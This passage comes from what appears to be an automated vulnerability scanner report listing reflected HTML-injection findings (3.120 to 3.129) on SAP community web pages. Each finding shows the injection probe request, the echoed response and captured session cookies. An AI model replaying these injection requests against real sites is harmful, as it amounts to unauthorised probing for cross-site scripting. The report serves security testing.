s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28909
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:00:43 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070">
...[SNIP]...
3.120. http://www.sdn.sap.com/irj/scn/bc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/bc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf04"><a>cae7ae068e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/bc?8cf04"><a>cae7ae068e4=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:17 GMT
Content-Length: 23294
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/bc?8cf04"><a>cae7ae068e4=1">
...[SNIP]...
3.121. http://www.sdn.sap.com/irj/scn/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aa4b"><a>cc0ea3522ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1">
...[SNIP]...
3.122. http://www.sdn.sap.com/irj/scn/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b43e"><a>55547d3eb18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/index?3b43e"><a>55547d3eb18=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 57953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/index?3b43e"><a>55547d3eb18=1">
...[SNIP]...
3.123. http://www.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6d"><a>e74a0162951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/logon?c6a6d"><a>e74a0162951=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Content-Length: 21705
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/logon?c6a6d"><a>e74a0162951=1">
...[SNIP]...
3.124. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/sdnweblogs/popularposts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e88"><a>b718e3f5e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691703148%3B%20pe%3Dno%2520value%7C1318691703151%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318691703155%3B%20s_nr%3D1318689903165-New%7C1321281903165%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293503170%3B%20s_visit%3D1%7C1318691703171%3B%20gpv_p47%3Dno%2520value%7C1318691703175%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ablog%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/sdnweblogs/popularposts%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 30557
Date: Sat, 15 Oct 2011 14:59:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1">
...[SNIP]...
3.125. http://www.sdn.sap.com/irj/scn/weblogs [blog parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b98"><a>ea3bc329510 was submitted in the blog parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28808
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:53 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510">
...[SNIP]...
3.126. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7cea"><a>41405d9f727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28819
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:27 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1">
...[SNIP]...
3.127. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77470"><a>5b7498adf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?77470"><a>5b7498adf8d=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:27 GMT
Content-Length: 21730
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?77470"><a>5b7498adf8d=1">
...[SNIP]...
3.128. http://www.sdn.sap.com/irj/sdn/mypoints [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/mypoints

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff7d"><a>9b3a83d8c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 45094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1">
...[SNIP]...
3.129. https://www.sme.sap.com/irj/sme/cpslogon [RelayState parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1c0"><a>a6b35360b1d was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut1d1c0"><a>a6b35360b1d HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
